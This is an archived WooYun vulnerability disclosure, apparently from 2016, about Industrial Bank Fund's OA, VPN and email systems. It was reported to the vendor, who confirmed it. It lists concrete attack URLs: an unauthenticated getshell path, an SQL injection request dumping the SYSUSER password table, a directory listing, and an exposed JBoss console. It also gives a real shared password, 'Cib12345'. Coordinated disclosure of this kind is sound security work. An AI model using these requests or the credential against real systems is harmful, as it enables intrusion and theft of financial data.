当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0169422

漏洞标题:基金安全之兴业基金OA、VPN、邮箱多个漏洞导致多姿势入内网(涉及大量财务运营数据\发现2012年后门)

相关厂商:兴业基金管理有限公司

漏洞作者: 路人甲

提交时间:2016-01-12 18:32

修复时间:2016-02-22 16:48

公开时间:2016-02-22 16:48

漏洞类型:命令执行

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-12: 细节已通知厂商并且等待厂商处理中
2016-01-12: 厂商已经确认,细节仅向厂商公开
2016-01-22: 细节向核心白帽子及相关领域专家公开
2016-02-01: 细节向普通白帽子公开
2016-02-11: 细节向实习白帽子公开
2016-02-22: 细节向公众公开

简要描述:

收益随随便便就几千万上亿,还有好多投资公司的信息

详细说明:

问题系统:
http://oa.cib-fund.com.cn/
1.这垃圾系统全是漏洞,可以直接获取shell:
WooYun: 泛微OA未授权可导致GetShell(简单粗暴,无需登录)
http://oa.cib-fund.com.cn/sysinterface/extpage/cssroot.jsp

1.png


2012年就被坏人shell了

1.2.png


2.png


2.sql注入:
http://oa.cib-fund.com.cn//ServiceAction/com.eweaver.base.DataAction?sql=select%20LONGONNAME,123442105,LOGONPASS%20from%20SYSUSER

3.png


4.png

漏洞证明:

3.邮箱大量通用密码:Cib12345 ,还有很多是弱口令

5.png


7.png


8.png


下面这么多邮箱都能登录,涉及的全是财务相关的,动不动就几十亿,吓傻了,不多贴了

mask 区域
*****sz*****
*****yf*****
*****hen*****
*****nc*****
*****ing*****
*****ns*****
*****nl*****
*****ubi*****
*****ns*****
*****nw*****
*****nx*****
*****nx*****
*****yy*****
*****zg*****
*****gx*****
*****gt*****
*****gt*****
*****gj*****
*****gh*****
*****o
*****
*****gq*****
*****t1*****
*****nm*****
*****hh*****
*****gw*****
*****ji*****
*****kb*****
*****le*****
*****l
*****
*****ng*****
*****xf*****
*****ng*****
*****ng*****
*****he*****
*****ru*****
*****ch*****
*****h
*****
*****o
*****
*****en*****
*****e
*****
*****ui*****
*****f
*****
*****x
*****
*****q
*****
*****xi*****
*****hm*****
*****li*****
*****ly*****
*****fx*****
*****rr*****
*****sd*****
*****xg*****
*****sj*****
*****xy*****
*****yh*****
*****in*****
*****an*****
*****d
*****
*****i
*****
*****y
*****
*****oc*****
*****b
*****
*****l
*****
*****h
*****
*****qj*****
*****nx*****
*****j
*****
*****gf*****
*****jb*****
*****qc*****
*****xi*****
*****ing*****
*****p
*****
*****ji*****
*****gx*****
*****xw*****
*****gc*****
*****gm*****
*****gs*****
*****gs*****
*****gw*****
*****uan*****
*****gy*****
*****gy*****
*****gz*****
*****ta*****
*****d
*****
*****yu*****
*****gx*****
*****wei*****
*****nw*****
*****an1*****
*****en*****
*****qin*****
*****an*****
*****ia*****
*****y
*****
*****e
*****
*****in*****
*****l
*****
*****da*****
*****gq*****
*****gy*****
*****gy*****
*****sw*****
*****wp*****
*****gj*****
*****xy*****
*****o
*****
*****in*****
*****xx*****
*****h
*****
*****ng*****
*****ng*****
*****ng*****
*****ng*****
*****qin*****
*****ng*****
*****ng*****
*****ng*****
*****ng*****
*****xue*****
*****ng*****
*****ol*****
*****oy*****
*****lin*****
*****ul*****
*****ong*****
*****uy*****
*****uy*****
*****grr*****
*****ox*****
*****ox*****
*****ng*****


</code>
4.邮箱之后是vpn通用,上面的账号全能登录

6.png


5.列目录漏洞:
http://oa.cib-fund.com.cn//document/imp/filebrowser.jsp?dir=c:

9.png


6.外送jboss命令执行,同样可以getshell,就不演试了
http://oa.cib-fund.com.cn:90/jmx-console/

10.png

修复方案:

这是提交了多少个漏洞,后门请自查、自删除。
声明:好人一枚,发现即提交

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2016-01-12 18:41

厂商回复:

谢谢白帽子提醒

最新状态:

暂无


漏洞评价:

评价

  1. 2016-01-12 20:05 | Hogns ( 普通白帽子 | Rank:128 漏洞数:20 | 呵呵哒)

    擦,tangscan

  2. 2016-01-13 00:39 | zeracker 认证白帽子 ( 普通白帽子 | Rank:1077 漏洞数:139 | 多乌云、多机会!微信公众号: id:a301zls ...)

    看完OA系统,突然想起了某OA厂商。。是某微吗